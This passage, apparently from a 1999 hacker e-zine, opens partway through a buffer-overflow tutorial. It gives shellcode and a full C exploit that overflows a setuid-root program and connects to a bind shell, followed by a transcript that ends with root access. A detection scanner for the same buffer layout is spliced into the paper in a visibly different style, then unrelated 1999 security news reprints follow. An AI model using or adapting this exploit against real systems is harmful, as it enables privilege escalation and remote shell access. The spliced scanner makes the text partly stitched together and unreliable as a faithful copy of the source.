      "\xcd\x80"                      /* int $0x80             */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\xb1\x02"                      /* movb $0x2,%cl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\x5b\xff\xff\xff";         /* call -0xa5            */
      
      unsigned long get_sp(void)
      {
      __asm__("movl %esp,%eax");
      }
      
      long getip(char *name)
      {
      struct hostent *hp;
      long ip;
      if((ip=inet_addr(name))==-1)
      {
      if((hp=gethostbyname(name))==NULL)
      {
      fprintf(stderr,"Can't resolve host.\n");
      exit(0);
      }
      memcpy(&ip,(hp->h_addr),4);
      }
      return ip;
      }
      
      int exec_sh(int sockfd)
      {
      char snd[4096],rcv[4096];
      fd_set rset;
      while(1)
      {
      FD_ZERO(&rset);
      FD_SET(fileno(stdin),&rset);
      FD_SET(sockfd,&rset);
      select(255,&rset,NULL,NULL,NULL);
      if(FD_ISSET(fileno(stdin),&rset))
      {
      memset(snd,0,sizeof(snd));
      fgets(snd,sizeof(snd),stdin);
      write(sockfd,snd,strlen(snd));
      }
      if(FD_ISSET(sockfd,&rset))
      {
      memset(rcv,0,sizeof(rcv));
      if(read(sockfd,rcv,sizeof(rcv))<=0)
      exit(0);
      fputs(rcv,stdout);
      }
      }
      }
      
      int connect_sh(long ip)
      {
      int sockfd,i;
      struct sockaddr_in sin;
      printf("Connect to the shell\n");
      fflush(stdout);
      memset(&sin,0,sizeof(sin));
      sin.sin_family=AF_INET;
      sin.sin_port=htons(30464);
      sin.sin_addr.s_addr=ip;
      if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
      {
      printf("Can't create socket\n");
      exit(0);
      }
      if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
      {
      printf("Can't connect to the shell\n");
      exit(0);
      }
      return sockfd;
      }
      
      void main(int argc,char **argv)
      {
      char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
      long addr;
      unsigned long sp;
      int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
      int i;
      int sockfd;
      
      if(argc>1)
      offset=atoi(argv[1]);
      
      sp=get_sp();
      addr=sp-offset;
      
      for(i=0;i<bsize;i+=4)
      {
      buff[i+ALIGN]=(addr&0x000000ff);
      buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
      buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
      buff[i+ALIGN+3]=(addr&0xff000000)>>24;
      }
      
      for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
      buff[i]=NOP;
      
      ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
      for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
      
      buff[bsize-1]='\0';
      
      printf("Jump to 0x%08x\n",addr);
      
      if(fork()==0)
      {
      execl("./vulnerable4","vulnerable4",buff,0);
      exit(0);
      }
      sleep(5);
      sockfd=connect_sh(getip("127.0.0.1"));
      exec_sh(sockfd);
      }
      ----------------------------------------------------------------------------
      
      exploit the vulnerable4 program
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ ls -l vulnerable4
      -rwsr-xr-x   1 root     root         4091 Oct 18 20:21 vulnerable4*
      [ ohhara@ohhara ~ ] {2} $ ls -l exploit4
      -rwxr-xr-x   1 ohhara   cse          7973 Oct 18 20:25 exploit4*
      [ ohhara@ohhara ~ ] {3} $ ./exploit4
      Jump to 0xbfffec64
      Connect to the shell
      Can't connect to the shell
      [ ohhara@ohhara ~ ] {4} $ ./exploit4 500
      Jump to 0xbfffea70
      Connect to the shell
      whoami
      root
      ----------------------------------------------------------------------------
      
      6.5 What can you do with this technique?
       Various remote exploits can be built with this technique. If the
      vulnerable host is behind a firewall, the socket can be opened on an
      unfiltered port. The technique is very useful when attacking an RPC service
      with a buffer overflow.
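
      Seen from the defending side, the buffer that exploit4.c builds has three
      recognisable parts: a run of NOP bytes, the socketcall stubs, and one stack
      address repeated many times. The scanner below is an added example, not code
      from the paper; scan_buffer, the thresholds and the sample buffer are
      constructed for illustration, and the sample holds only the four syscall
      stubs, not working shellcode.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Thresholds are assumptions chosen for this example, not values from the paper. */
#define MIN_NOP_RUN      32
#define MIN_ADDR_REPEATS 4

struct smash_report {
    size_t   nop_run;      /* longest run of 0x90 (the paper's NOP) bytes        */
    size_t   addr_repeats; /* longest run of one repeated 0xbf?????? word        */
    uint32_t addr;         /* that repeated word, 0 if none was seen             */
    unsigned socketcalls;  /* bit n set: movb $0x66,%al; movb $n,%bl; int $0x80  */
};

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Scan a program argument or network payload for the three parts. */
struct smash_report scan_buffer(const unsigned char *buf, size_t len)
{
    struct smash_report r = {0, 0, 0, 0};
    size_t i, run = 0;

    for (i = 0; i < len; i++) {
        /* 1. NOP sled: consecutive 0x90 bytes. */
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run > r.nop_run)
            r.nop_run = run;

        /* 2. socketcall stub: b0 66 b3 NN cd 80, NN = subcode 1..17
         *    (socket .. recvmsg). */
        if (i + 6 <= len && buf[i] == 0xb0 && buf[i + 1] == 0x66 &&
            buf[i + 2] == 0xb3 && buf[i + 3] >= 1 && buf[i + 3] <= 17 &&
            buf[i + 4] == 0xcd && buf[i + 5] == 0x80)
            r.socketcalls |= 1u << buf[i + 3];

        /* 3. Return-address fill: the same little-endian word repeated at a
         *    4-byte stride. Top byte 0xbf is an assumption taken from the
         *    addresses the transcript prints (0xbfffec64, 0xbfffea70). */
        if (i + 4 <= len && buf[i + 3] == 0xbf) {
            uint32_t w = le32(buf + i);
            size_t n = 1, j = i + 4;
            while (j + 4 <= len && le32(buf + j) == w) {
                n++;
                j += 4;
            }
            if (n > r.addr_repeats) {
                r.addr_repeats = n;
                r.addr = w;
            }
        }
    }
    return r;
}

/* Sled plus repeated stack address: the classic stack-smash layout. */
int is_stack_smash(const struct smash_report *r)
{
    return r->nop_run >= MIN_NOP_RUN && r->addr_repeats >= MIN_ADDR_REPEATS;
}

/* socket(1), bind(2), listen(4) and accept(5) all requested. */
int opens_listener(const struct smash_report *r)
{
    const unsigned need = 1u << 1 | 1u << 2 | 1u << 4 | 1u << 5;
    return (r->socketcalls & need) == need;
}

/* Constructed sample: 64 NOPs, four bare socketcall stubs, ten copies of the
 * address shown in the transcript. It is inert: no arguments are set up. */
size_t build_sample(unsigned char *out, size_t cap)
{
    static const unsigned char calls[] = {1, 2, 4, 5};
    size_t n = 64, i;

    if (cap < 128)
        return 0;
    memset(out, 0x90, 64);
    for (i = 0; i < 4; i++) {
        const unsigned char stub[6] = {0xb0, 0x66, 0xb3, calls[i], 0xcd, 0x80};
        memcpy(out + n, stub, 6);
        n += 6;
    }
    for (i = 0; i < 10; i++) {
        out[n++] = 0x70; out[n++] = 0xea; out[n++] = 0xff; out[n++] = 0xbf;
    }
    return n;
}

int main(void)
{
    unsigned char sample[128];
    size_t n = build_sample(sample, sizeof sample);
    struct smash_report r = scan_buffer(sample, n);

    printf("nop_run=%zu addr=0x%08x x%zu socketcalls=0x%x\n",
           r.nop_run, (unsigned)r.addr, r.addr_repeats, r.socketcalls);
    printf("stack smash: %d, opens listener: %d\n",
           is_stack_smash(&r), opens_listener(&r));
    return 0;
}
```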
      
      7. Summary
       This paper introduced four buffer overflow techniques: passing through
      filtering, changing the uid back to 0, breaking chroot, and opening a socket.
      These techniques are very useful when you write buffer overflow exploit
      code. In addition, they can be combined.
       All programmers MUST be careful when writing a setuid root program or server
      program!!! PLEASE BE CAREFUL!!!!!
      
      8. References
       Smashing The Stack For Fun And Profit by Aleph1
       wu-ftpd remote exploit code by duke
       ADMmountd remote exploit code by ADM
      
      9. Etc
       Sorry for my poor English. :(
      
       Written by Taeho Oh ( ohhara@postech.edu )
      ----------------------------------------------------------------------------
      Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
      PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
      PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
      ----------------------------------------------------------------------------
      
      
                       ------------------------------------------
                       Special thanks to all of PLUS members. ^_^
                       ------------------------------------------
      
      
      
      -------------------------------------------------------------------------------
      -------------------------------------------------------------------------------
      -------------------------------------------------------------------------------
      
      @HWA                                                                                                                                             
      
35.0  UK Gov. Given Lifetime Menace Award 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      Privacy International, a civil liberties group, has awarded
      the UK Government its "Lifetime Menace Award". The
      award was given for numerous privacy violations by the
      UK government. 

      CMP TechWeb
      http://www.techweb.com/wire/story/TWB19991019S0007

      Privacy Group Boots U.K. Govt. For Net Spying
      By Madeleine Acey, TechWeb
      Oct 19, 1999 (10:41 AM)
      URL: http://www.techweb.com/wire/story/TWB19991019S0007

      Civil liberties group Privacy International singled out the British 
      government for criticism on Monday night at its annual Big Brother Awards 
      ceremony in London. Internal affairs department the Home Office won the 
      "Lifetime Menace Award" for what Privacy International director 
      Simon Davies called a "litany of privacy violations."

      The London and Washington D.C.-based group highlighted the Home Office's 
      review of the Interception of Communications Act, which earlier this year 
      proposed to add Internet transmissions to other telecom traffic that could 
      be lawfully intercepted by law enforcement agencies.

      The review caused controversy in the ISP community as it proposed 
      requiring ISPs and other communications service providers to provide 
      interception capability for law enforcement officials in real time at any 
      time.

      Along with curbs to the right to silence and the right to peaceful protest 
      in other legislation, and creating a national DNA database, Privacy 
      International also lambasted the department for opposing European Union 
      efforts to strengthen data protection regulations.

      David Omand, head of the Home Office, was not available to receive or 
      comment on the award, but Cambridge student Richard Makepeace -- 
      presenting the award for Privacy International -- delivered the 
      gold-colored cast of a boot crushing a man's head to a representative at 
      Omand's office. Makepeace said having the award received 
      at all was a major step forward for the civil liberties community -- even 
      though his accompanying cameraman was thrown out of the building. Last 
      year's Lifetime Menace Award recipient -- the Menwith Hill spy base in the 
      north of England run by the U.S. National Security Agency -- had him 
      arrested. 
      

      @HWA
      
36.0  DOD Sys Admins Need Top Secret Clearance 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      The Pentagon will soon require top-secret security
      clearances for all system administrators. The Pentagon
      also will roll out a system of authentication for all the
      agency's computer users, according to the Department
      of Defense's chief information officer. (I feel sorry for all
      the Sys Admins that have to go through the mess of
      getting a Top Secret clearance. Just remember, the
      private sector awaits.) 

      GovExec.com       
      http://www.govexec.com/dailyfed/1099/101999b4.htm
      
      October 19, 1999

      DAILY BRIEFING
 
      Pentagon beefs up information
      security
 
      By Drew Clark, National Journal's Technology Daily
 
      Spurred by the rising threat of hacking attempts, the Pentagon is
      rethinking its approach to network security by requiring
      top-secret security clearances for all system administrators. 
 
      The Pentagon also will roll out a system of authentication for all
      the agency's computer users, according to the Department of
      Defense's chief information officer. 
 
      "The strength of the U.S. is its information technology. The
      weakness of the U.S. is its information technology," said Arthur
      Money, Defense Department CIO and senior civilian official in
      the Office of the Assistant Secretary of Defense. Money spoke
      Monday at the 22nd National Information Systems Security
      Conference sponsored by the National Institute of Standards and
      Technology and the National Security Agency. 
 
      Increasingly, information that is considered "sensitive" but not
      officially classified, such as hospital records, aircraft dispositions
      and research laboratory findings, has become a vulnerable part
      of the Defense Department's arsenal of information. That's
      because of the ability of outside computers to assemble snippets
      of apparently harmless material into a valuable dossier. 
 
      During testimony before a Senate committee earlier this month,
      Michael Vatis, the top official of the FBI's National Information
      Protection Center, said that the agency suspected Russian
      officials of attempting to break into such sensitive information in
      Defense Department computers. 
 
      Money said the recently disclosed "Moonlight Maze" hacking
      attempts on the Pentagon were far more sophisticated than the
      January 1998 attack known as "Solar Sunrise," which was later
      traced to several American teenager hackers exploiting known
      vulnerabilities in Defense Department computers. 
 
      "This is no longer hackers, but a state-sponsored attack," said
      Money. "Over a year, the severity and the frequency has
      increased dramatically." 
 
      While mandatory top-secret security clearances are designed to
      combat such problems, the Pentagon is instituting an extensive
      public-key infrastructure that will allow DoD to better track
      possible security breaches. 
 
      The PKI rollout, to be conducted in face-to-face sessions with
      computer users, will begin with a few hundred thousand military
      officials. But its scope will eventually expand to cover nearly 7
      million civilian and military personnel and contractors, Money
      said. He cited C.P. Snow, a British scientist who aided the
      country's military during World War II, who said: "Technology is
      a queer thing, it brings you great gifts on the one hand, but stabs
      you in the back on the other." 
      
      @HWA
      
37.0  Singapore Tough on Cyber Crime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Citing dangers to Singapore's growing e-commerce
      development Chief Justice Yong Pung How has called for
      jail time for all cyber crime offenders regardless of age
      or offense. The Chief Justice has reversed a District
      Court's ruling of 2 1/2 years probation for an offender
      sentenced last June and instead sent the 17-year-old
      to jail for four months. 

      The Straits Times     
      http://www.straitstimes.asia1.com/cyb/cyb1_1020.html
      
      OCT 20 1999 

      Hacking a serious crime, says CJ 

      Offenders undermine country's efforts to build itself
      up as e-commerce hub, and must be dealt with
      severely

      By LIM SENG JIN

      HACKING into computers is a serious crime that must
      be nipped in the bud if Singapore's efforts to become a
      global e-commerce hub are not to be compromised, said
      Chief Justice Yong Pung How yesterday. So even young
      offenders can be jailed, as Parliament had meant for
      cyber-crimes to be dealt with severely. 

      The CJ said this in his written grounds of decision for
      jailing a 17-year-old hacker earlier this month.
      Muhammad Nuzaihan Kamal Luddin, a Secondary 5
      student at Geylang Methodist Secondary, had hacked into
      the servers of Swiftech Automation and Singapore Cable
      Vision (SCV). In June, a district court had put him on
      probation for 2-1/2 years. 

      But the CJ set this aside and jailed him for four months
      instead, after a prosecution appeal. 

      Probation orders, he ruled, were not "realistic solutions for
      these new crimes" because they are based on the "simple
      concept of rehabilitation" -- keeping young offenders at
      home at night so they stay out of trouble. 

      But in computer misuse offences, keeping an offender at
      home does not guarantee he will not re-offend. 

      The fact that the youth's parents had failed to stop him
      committing the crimes in the first place, strengthens the
      view that they could not ensure he behaves even on
      probation, he said. 

      These offences were not "one-off isolated incidents
      committed out of boredom or curiosity amidst the throes
      of harmless youthful rebellion", he said, adding that the
      youth showed "a persistent course of conduct" with
      "criminal intent". 

      He noted that Nuzaihan hacked into SCV's server only
      after it turned down his application for its cable modem
      service, which was not yet available in his estate. 

      The "obvious inference", he said, was that the youth,
      dissatisfied with SCV's response, "deliberately set out to
      get around the problem by utilising illegal means". 

      In July last year, he used Swiftech's server to access
      Internet Relay Chat (IRC). 

      "His arrogance was also evident in the fact that he had
      proudly proclaimed to the other IRC users that he was
      able to compromise a server running on the Linux
      operating system," added the CJ. 

      Nuzaihan "even had the presence of mind to obliterate all
      traces of his intrusions, so as to avoid detection," he
      noted. 

      He said: "In my view, such anti-social conduct... not only
      undermines public and international confidence in the
      commercial integrity and viability of our computer
      systems, it also gravely compromises Singapore's efforts
      to position itself as a global e-commerce hub." 



      TALENT: Putting it to good use

      'I recognise that Nuzaihan is an intelligent and resourceful
      young man whose true talent and potential, when
      harnessed under the right conditions, can be of immense
      value to the country. It is hoped that the experience of life
      in prison will instil in him a sense of maturity and
      responsibility, and teach him to put his computing skills to
      legitimate use upon his release, thus enabling him to
      contribute usefully to society.'
      -- Chief Justice Yong Pung How on hacker
      Muhammad Nuzaihan Kamal Luddin 
      
      @HWA
      
38.0  Student Poses as Teacher for Prank 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      A student at a high school in East Greenwich RI,
      created a false account on SchoolNotes.com under the
      name of one of his teachers. SchoolNotes.com is used
      by educators to post homework and other assignments.
      The 15-year-old student was charged on Oct. 6 with
      the use of false computer information, which is a
      misdemeanor. The owners of SchoolNotes.com said that
      they will look at increased security options. 

      Associated Press       
      http://library.northernlight.com/ED19991019470000035.html?cb=0&dx=1006&sc=0#doc

      Story Filed: Tuesday, October 19, 1999 5:54 PM EDT 

      PROVIDENCE, R.I. (AP) -- An Internet site used by teachers across the 
      country recently included what looked like a note from a teacher admitting 
      he molested children and dogs. 

      But it turned out to be a prank by a student at the teacher's high school 
      in East Greenwich, police say. 

      The 15-year-old student was charged on Oct. 6 with the use of false 
      computer information, a misdemeanor, and could be expelled. He was 
      released to the custody of his parents and is due to appear before the 
      East Greenwich juvenile hearing board this week. 

      The prank has the owners of SchoolNotes.com wondering how they can 
      increase security on the Web site, which is used by about 25,000 teachers 
      to post curriculum information and homework assignments. 

      Ricardo Valencia, a spokesman for Copernicus Interactive, which owns 
      SchoolNotes.com, said the company is ``appalled'' by the boy's act and 
      ``very concerned about students being able to access or to hack their way 
      onto the Web site.'' 

      Teachers must subscribe to the service to post information. Posing as the 
      teacher, the student created an account in the teacher's name and posted 
      the note, police said. 

      Neither was identified. 

      Another teacher at the school discovered the note and informed school 
      authorities. 

      The student has admitted to the crime, said East Greenwich police Det. Lt. 
      William Higgins. 

      ``He thought it would be a funny prank for him and his friends to view,'' 
      he said. 

      Copyright 1999 Associated Press Information Services, all rights 
      reserved.
      
      @HWA
      
39.0  Axent Makes Outrageous Claims 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Q Bahl 
      Yesterday, AXENT announced that their Raptor Firewall
      was "inaccessible to almost every hack attempted on it"
      during the contest that PC Week held at
      www.hackpcweek.com. (Almost? So which attacks
      succeeded?) Axent went on to say that the test "proves
      yet again that security is no longer a technology issue".
      (Many people have serious doubts about the security of
      any firewall that runs on NT, but if AXENT says it's "no
      longer a technology issue", well... they must be right.) 

      Yahoo News       
      http://biz.yahoo.com/bw/991019/md_axent_1.html
      
      Tuesday October 19, 8:10 am Eastern Time
      Company Press Release

      AXENT's Raptor Firewall Meets the Challenge in PC Week Hacker Contest

      In Open Dare to Hackers, AXENT's Award-Winning Firewall Proves Virtually 
      Impenetrable

      ROCKVILLE, Md.--(BUSINESS WIRE)--Oct. 19, 1999--AXENT Technologies, Inc. 
      (NASDAQ: AXNT - news), one of the world's leading information security 
      solution providers, today announced that its award-winning Raptor 
      Firewall was inaccessible to almost every hack attempted on it 
      during a contest held by PC Week Labs, in which hackers tried to gain 
      access to servers the Firewall was protecting. The lab was configured to 
      mirror ``real-world'' scenarios for both Linux and Windows NT servers 
      that may be compromised by unauthorized access. As organizations expand 
      their e-business initiatives and open up their Web sites to customers, 
      partners and employees, this test proves yet again that security is no 
      longer a technology issue, but a business enabler, protecting critical 
      business information. 

      In last week's review, which can be viewed at http://www.hackpcweek.com, 
      PC Week Labs said, ``After going through these tests, we cannot understate 
      the importance of a good firewall. We used AXENT Technologies Inc.'s 
      Raptor Firewall and blocked every port except Port 80 for regular 
      HTTP traffic. This configuration is about as simple--and safe--as it can 
      get.'' The October 11 article notes several recommendations to prevent 
      authorized access, the number one suggestion being to ``use a firewall, 
      but not just any firewall.'' 

      ``This challenge put forth by PC Week Labs proves yet again why AXENT's 
      Raptor Firewall is the undisputed market leader,'' said Jason Diesel, 
      product manager at AXENT(TM). ``The Raptor Firewall, when used in 
      conjunction with our award-winning host- and network-based 
      intrusion detection systems, provides customers a sound security solution 
      for their e-business needs. Basic packet filtering is not enough to 
      protect valuable information located on servers; attackers know this and 
      can exploit vulnerabilities within IP networking. The Raptor Firewall 
      takes security a step further by examining the contents of the application 
      data, ensuring that it meets the protocol specifications.'' 

      Reviewers added, ``When we did testing in conjunction with the Department 
      of Defense we found out they were using Raptor. Do we really need to 
      explain why we chose their firewall, which goes hand-in-hand with their 
      intrusion detection system?'' 

      About Raptor Firewall 

      PC Week Labs' choice of AXENT's Raptor Firewall is just the latest 
      validation from the industry, with numerous accolades from top 
      publications, such as Network Computing, Data Communications, InfoWorld, 
      and Datamation. Recently, Network World awarded Raptor Firewall with 
      its coveted ``Blue Ribbon'' Award for being ``a well-rounded enterprise 
      firewall that goes the extra mile for security features.'' In addition, in 
      a Computerwoche article, the GartnerGroup positions AXENT as the market 
      leader in its Firewall Magic Quadrant for its combined ability to execute 
      and completeness of vision. 

      AXENT's Raptor Firewall is the premier enterprise firewall providing 
      complete perimeter security for customers' networks. Unlike other 
      technologies, the Raptor Firewall's use of strong-proxy architecture 
      enables organizations to scan application-specific data, enhancing 
      the security and control of their network's data. 

      Raptor Firewall's unique, strong-proxy technology has been integrated with 
      industry-leading security solutions and standards as part of AXENT's Smart 
      Security Architecture, which builds smart and appropriate integration 
      between products and services to deliver real value for customers. 
      This integration includes standard IPSec VPN technology, International 
      Computer Security Association(TM) (ICSA(TM)) certification, a Microsoft 
      Management Console (MMC) interface, Entrust-Ready(TM) public key 
      infrastructure (PKI) encryption support and integration with other AXENT 
      solutions, including the NetProwler(TM) network-based intrusion detection, 
      Intruder Alert(TM) host-based intrusion detection and Defender(TM) 
      authentication solutions, as well as bundled with NetRecon(TM), the 
      host-based assessment solution. 

      About AXENT(TM) 

      AXENT Technologies, Inc., a global leader in information security, 
      provides e-security solutions that maximize our customers' business 
      advantage. AXENT delivers integrated products and expert services to 
      assess, protect, enable and manage business processes and       
      information assets. Through its unique Lifecycle Security(TM) methodology 
      combined with Smart Security Architecture, AXENT delivers the ``right'' 
      level of security for customers. Award-winning solutions offer assessment 
      and policy compliance, firewall, intrusion detection, authentication, VPN, 
      Web-access, single sign-on and user administration for the entire 
      enterprise. 

      Headquartered in Rockville, MD, AXENT's customer-proven information 
      security solutions are used by 45 of the Fortune 50 and governments 
      worldwide. Contact AXENT via e-mail at info@axent.com, or visit AXENT's 
      World Wide Web site at http://www.axent.com. 

      AXENT, AXENT Technologies, the AXENT logo, Raptor, Intruder Alert, 
      Defender, NetProwler, NetRecon and Lifecycle Security are trademarks or 
      registered trademarks, in the United States and certain other countries, 
      of AXENT Technologies, Inc. or its subsidiaries. Windows NT and 
      Microsoft are registered trademarks of Microsoft Corporation; 
      Entrust-Ready is a trademark of Entrust Technologies, Inc.; International 
      Computer Security Association and ICSA are trademarks of ICSA, Inc.; other 
      product names and trademarks are the property of their respective owners. 

      Contact: 

      AXENT Technologies, Inc.
      Cynthia S. Smith, 301/258-5043
      info@axent.com
      or
      Schwartz Communications
      Dan Ring or Mike Schultz, 781/684-0770
      axent@schwartz-pr.com
      
      @HWA
      
40.0  Where Do We Stand With Crypto 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Q Bahl 
      Here is a decent rant about the recent developments in
      the wild world of encryption. They talk about the new
      laws passed in the UK, our own struggles here in the
      US, and hint about secret government intrusion
      detection systems. It is somewhat watered-down as far
      as tech content goes, but drives home the point that
      there's no such thing as privacy on the Internet. 

      ZD Net       
      http://www.zdnet.com/pccomp/stories/reviews/0,5672,2346711,00.html
      
      
 
      Encrypt Your Mail, Go to Jail
      Christopher Null, PC Computing 
      October 18, 1999
 
      The scenario is more likely than you might think, with
      recently proposed legislation overseas threatening to
      make failure to decrypt any file on request punishable by
      two years in the slammer. Furthermore, the United
      Kingdom's Electronic Commerce Bill states that if you
      tip off somebody that he or she is under any kind of
      electronic investigation, it's five years of jail time. All
      because you wanted to protect your confidential
      information. 
 
      And this isn't just a foreign issue. It could happen right
      here at home. 
 
      U.S. legislation intended to relax encryption hassles,
      especially regarding its export, has been languishing in
      committee after committee for years. Virginia
      Republican Bob Goodlatte introduced the original bill to
      allow the export of strong encryption that is already
      available overseas. It would also limit the U.S.
      government's ability to require programs for domestic
      use to have back doors that would give law-enforcement
      officials access to encoded data. 
 
      But such an innocuous bill faces strong opposition from
      the likes of Attorney General Janet Reno, FBI director
      Louis Freeh, and President Clinton himself, who fear
      that loosening export restrictions would put security
      products into the hands of international criminals. It is
      often highlighted, to little avail, that the same products
      are already available from non-U.S. producers.
      Meanwhile, a San Francisco U.S. Appeals Court has
      struck down the existing export limits as a violation of
      the First Amendment, but this decision is pending yet
      another appeal. 
 
      Encryption may be even more critical if Clinton's plan to
      create a national computer security system to monitor
      and prevent computer hacking comes to fruition. Not
      only would this plan monitor popular hack targets like the
      Pentagon and the CIA, but it would also screen certain
      as-yet-undefined private-industry computers. The gist of
      this is that your company's private transactions with
      another company may very well be subject to electronic
      eavesdropping. Clinton wants this system in place no
      later than 2003. 
 
      Encryption, online privacy, and freedom of speech have
      already been threatened by legal actions over
      anonymous comments. Lilly Industries is the latest
      company to get litigious with faceless critics. In this
      case, five people who posted unflattering statements
      about Lilly management on Yahoo.com's finance
      message boards are under attack. And Yahoo.com has
      been more than compliant about turning over confidential
      subscriber data under subpoena -- without notifying its
      subscribers. 
 
      Online privacy has never been threatened to the extent it
      is today, and signs point to the problem getting worse
      before it gets better. Meanwhile, protect your critical
      data and e-mail transactions with the strongest
      encryption you can get, write your congressperson to
      support the Goodlatte Bill, and above all, avoid
      defamatory statements in so-called anonymous forums. 
 
      If the Internet has taught us anything, it's that there's no
      such thing as online anonymity. 
 
      Blair Myth: Fans of the already cult favorite Blair
      Witch Project may not be so rabid. The independent film
      is widely regarded as the first motion picture to use the
      Internet as a promotional vehicle to the virtual exclusion
      of other media. The magic? More than 20 fan sites,
      which were built before the movie opened. Cries of
      fakery have been raised and are spilling over to other
      questionable testimonials -- namely to customer
      comments at Amazon.com and its ilk. 
 
      U-Store-It: Big moves on the storage front. IBM is
      introducing an ultrahigh-capacity storage device,
      code-named Shark, that will scale up to 11 terabytes
      (11,264GB). 
 
      veto@whitehouse.gov: Twenty-eight years after the
      first e-mail was sent, Congress gets in on the action with
      the first bill sent by e-mail (re: Y2K, natch) to the Prez. 
 
      Free Lunch: More rips in the free-PC movement as
      Microworkz loses its Internet service deal with
      EarthLink and free-PC provider Enchilada goes under
      after three months. 
 
      $30 CDs: Sony and Matsushita roll out ultrahi-fi CD
      players. But that smooth vinyl sound will cost $30 per
      disc. Really. 
 
      Big Bandwidth: Bid farewell to PCI. Next year, watch
      for NGIO (Next Generation Input/Output), a superfast
      I/O standard that runs at 2.5Gbps per channel, to take
      over. 
 
      IDT Gets Out: First Cyrix goes on the block; now IDT,
      maker of the low-cost WinChip, is bowing out of the x86
      CPU market. 
      
      @HWA
      
41.0  Customs Service Uses Web to Catch Crooks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      U.S. Customs Service's Cyber Smuggling Center is on
      the prowl for online child pornography, virtual money
      laundering, illegal drug sales, and music and software
      pirates. No longer are customs agents stuck in dingy air
      and sea ports; now they are surfing the web looking for
      illegal imports. 

      PC World       
      http://www.pcworld.com/pcwtoday/article/0,1510,13343,00.html
      

      Surfing With U.S. Customs

      U.S. Customs Service tries to stop the flood of
      e-crime.

      by Tom Spring, PC World 
      October 18, 1999, 5:38 p.m. PT 

      FAIRFAX, Virginia -- In the high-tech game of cops and
      robbers, online thugs are still one step ahead of the
      law. 

      That's the lament of Glenn Nick, assistant director for
      the U.S. Customs Service's CyberSmuggling Center. 

      Once upon a time, it was easier for Customs agents to
      catch crooks trying to smuggle contraband across the
      U.S. border. Their targets were heroin-lined suitcases,
      teddy bears packed with hundred-dollar bills, and brown
      paper bags stuffed with Danish pornography. 

      But now Customs agents police the country's
      "e-borders" for the invisible threats of online child
      pornography, virtual money laundering, illegal drug
      sales, and music and software buccaneers. 

      "It's a high-tech Wild West out there," Nick says. Last
      year, Customs agents made 228 arrests, but that
      barely scratches the surface, he adds. 


      It's the Music, Ma'am

      Sitting at a computer in a nondescript building
      overlooking a highway in this Virginia suburb, Delbert
      Richburg looks no different from any office worker
      taking a digital music break. 

      But this is Customs' CyberSmuggling Center, and
      today the special agent's job is to crack down on a
      rough MP3 music site illegally hosting thousands of
      hours of copyrighted music. This site, and dozens like
      it, come to his attention each day from tips forwarded
      by organizations like the Recording Industry
      Association of America. 

      Richburg, one of about 20 full-time agents working at
      the center on enforcement projects, types in a URL and
      sees a Web page hawking thousands of illegal MP3s.
      He shakes his head. "I could find a new MP3 site once
      a minute for the rest of the day if I tried," he says. 

      While it takes little time to find illegal sites, it takes
      weeks or months to gather evidence, identify the
      owner, and shut down a site. Arrests of music pirates
      are extremely rare, Nick says, because the threat of
      prosecution is enough to make them disappear. 

      With Customs' help, the RIAA says it has sent out
      thousands of cease and desist orders. The RIAA says
      only five civil suits have been brought against Net
      music pirates who violated federal copyright laws. 


      The Pedophile Patrol

      On the other hand, Customs agents arrest someone
      every other day in child pornography cases. Just down
      the hall from Richburg, colleagues are posing online as
      children conversing in public chat rooms with
      suspected pedophiles. 

      Others probe confiscated PC hard disks for damning
